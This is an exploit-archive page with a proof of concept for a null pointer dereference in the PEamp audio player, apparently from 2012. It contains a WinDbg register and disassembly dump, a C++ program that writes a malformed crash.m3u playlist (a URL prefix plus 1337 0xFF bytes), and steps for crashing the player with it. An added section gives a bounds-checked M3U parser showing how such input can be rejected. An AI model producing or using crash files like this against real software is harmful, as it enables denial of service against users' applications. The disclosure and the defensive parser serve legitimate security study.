
PEamp Null Pointer Dereference PoC

09 Jun 2012 00:00:00 | Reported by Ayrbyte | Type: zdt | Source: 0day.today

Null Pointer Dereference in PEamp audio player

Code
/*Title: PEamp Null Pointer Dereference PoC
Author: Ayrbyte
Link: http://www.softpedia.com/get/Multimedia/Audio/Audio-Players/mp3player.shtml
Version: v1.02b
Tested on: Windows 7
Fb: facebook.com/Ayrbyte
Greetz To : all CREMY Family, and for all Indonesian h4x0r

    ??  %%  %% $$$$$        >>  > ::    ;;;;;;;;
   ?? ?  %% %% $$ $$ ||      >> > ::    ;;    ;;
  ?????   %%%% $$$$$ ||___    >>> ::::: ;;;;;;;
 ??   ??    %% $$$$  ||  ||     > ::    ;;
      %%%%%%%% $$ $$ ||__|| >>>>> ::::: ;;;;;;;;
    ______________>>Ayrbyte<<_______________
   Gamerz From CREMY | CRazy Experience arMY

[registers]
eax=ffffffff ebx=76b0cc62 ecx=199dee10 edx=00000000 esi=03342d28 edi=0040141b
eip=750b736d esp=0012ed34 ebp=0012ed5c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246

[disassembly]
KERNELBASE!lstrlen:
750b7353 6a08            push    8
750b7355 6890730b75      push    offset KERNELBASE!lstrlen+0x3d (750b7390)
750b735a e841a3ffff      call    KERNELBASE!ReleaseMutex+0x3f (750b16a0)
750b735f 8b4508          mov     eax,dword ptr [ebp+8]
750b7362 85c0            test    eax,eax
750b7364 741f            je      KERNELBASE!lstrlen+0x32 (750b7385)
750b7366 8365fc00        and     dword ptr [ebp-4],0
750b736a 8d5001          lea     edx,[eax+1]
750b736d 8a08            mov     cl,byte ptr [eax]          ds:0023:ffffffff=?? <--NullPointer
750b736f 40              inc     eax
750b7370 84c9            test    cl,cl
750b7372 75f9            jne     KERNELBASE!lstrlen+0x1a (750b736d)
750b7374 2bc2            sub     eax,edx
750b7376 c745fcfeffffff  mov     dword ptr [ebp-4],0FFFFFFFEh
750b737d e86ea4ffff      call    KERNELBASE!WaitForSingleObjectEx+0xc0 (750b17f0)
750b7382 c20400          ret     4
750b7385 33c0            xor     eax,eax
750b7387 ebf4            jmp     KERNELBASE!lstrlen+0x2a (750b737d)

*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\system32\KERNELBASE.dll - 
KERNELBASE!lstrlen+0x1a:
eax overwritten with ffffffff; at offset 750b736d (mov cl,byte ptr [eax]) ds:0023:ffffffff=?? <--Null Pointer Dereference
*/
//Poc :
#include <cstdio>
//WARNING: first load crash.m3u, then click "add" or "load" or "save";
//the program will crash
char _isi[] = "http://.";   // playlist prefix, written once
char _A[]   = "\xFF";       // a single 0xFF byte, written 1337 times
int main(){
    const char *_namefile = "crash.m3u";
    FILE *_file = fopen(_namefile, "w");
    if (_file == NULL) {
        perror("fopen");
        return 1;
    }
    fputs(_isi, _file);
    for(int i=0;i<1337;i++){fputs(_A, _file);}
    fclose(_file);
    return 0;
}
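Added example, not part of Ayrbyte's PoC or of PEamp: a bounds-checked M3U reader in C++ that shows how a playlist parser can handle the file shape the PoC produces (the 8-byte prefix "http://." followed by 1337 bytes of 0xFF and no line terminator) without handing an unchecked pointer to a string routine such as the lstrlen call in the crash dump above. Every length is taken from the buffer size rather than from a NUL terminator, and each line is checked for length and content before it is copied out. The entry limit kMaxEntryLen, the function names and the benign playlist are assumptions; both inputs are constructed in memory rather than read from disk.

```cpp
#include <cstddef>
#include <cstdio>
#include <string>
#include <vector>

// Constructed in-memory copy of the PoC's crash.m3u: the 8-byte prefix
// "http://." followed by 1337 bytes of 0xFF and no line terminator.
std::vector<unsigned char> buildCrashImage() {
    const std::string prefix = "http://.";
    std::vector<unsigned char> data(prefix.begin(), prefix.end());
    data.insert(data.end(), 1337, static_cast<unsigned char>(0xFF));
    return data;
}

// Constructed well-formed playlist for comparison (directive, CRLF line, LF line).
std::vector<unsigned char> buildBenignImage() {
    const std::string text = "#EXTM3U\nhttp://example.invalid/a.mp3\r\ntrack.mp3\n";
    return std::vector<unsigned char>(text.begin(), text.end());
}

struct ParseResult {
    std::vector<std::string> entries;  // accepted playlist entries
    std::size_t rejected = 0;          // lines dropped by validation
    bool truncated = false;            // final line had no '\n'
};

// Assumed per-entry limit (hypothetical; MAX_PATH-sized buffers are typical
// in players, so anything longer cannot be a usable path or URL anyway).
constexpr std::size_t kMaxEntryLen = 260;

bool isPrintableAscii(unsigned char c) { return c >= 0x20 && c < 0x7F; }

// Bounds-checked M3U reader. Lengths come from the buffer, never from a
// terminator, so the 0xFF run is rejected instead of being passed on.
ParseResult parseM3u(const std::vector<unsigned char>& buf) {
    ParseResult r;
    std::size_t start = 0;
    while (start < buf.size()) {
        std::size_t end = start;
        while (end < buf.size() && buf[end] != '\n') ++end;
        const bool hasTerminator = end < buf.size();
        if (!hasTerminator) r.truncated = true;

        std::size_t len = end - start;
        if (len > 0 && buf[start + len - 1] == '\r') --len;  // tolerate CRLF

        bool ok = len <= kMaxEntryLen;
        for (std::size_t i = start; ok && i < start + len; ++i)
            if (!isPrintableAscii(buf[i])) ok = false;  // reject control/high bytes

        if (ok) {
            std::string line(buf.begin() + start, buf.begin() + start + len);
            // Empty lines and '#' directives are valid but are not entries.
            if (!line.empty() && line[0] != '#') r.entries.push_back(line);
        } else {
            ++r.rejected;
        }
        start = end + 1;  // step past the '\n'; exits when start >= size
    }
    return r;
}

int main() {
    ParseResult crash = parseM3u(buildCrashImage());
    std::printf("crash.m3u: %zu entries, %zu rejected, truncated=%d\n",
                crash.entries.size(), crash.rejected, crash.truncated ? 1 : 0);
    ParseResult benign = parseM3u(buildBenignImage());
    std::printf("benign: %zu entries, %zu rejected, truncated=%d\n",
                benign.entries.size(), benign.rejected, benign.truncated ? 1 : 0);
    return 0;
}
```

Run against the crash image the reader reports zero entries, one rejected line and a truncated final line; the benign image yields two entries and nothing rejected. The point is that the decision to reject is made on the byte count and byte values before any copy or string call, which is the step the faulting code path in the dump evidently lacks.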




#  0day.today [2018-01-02]  #
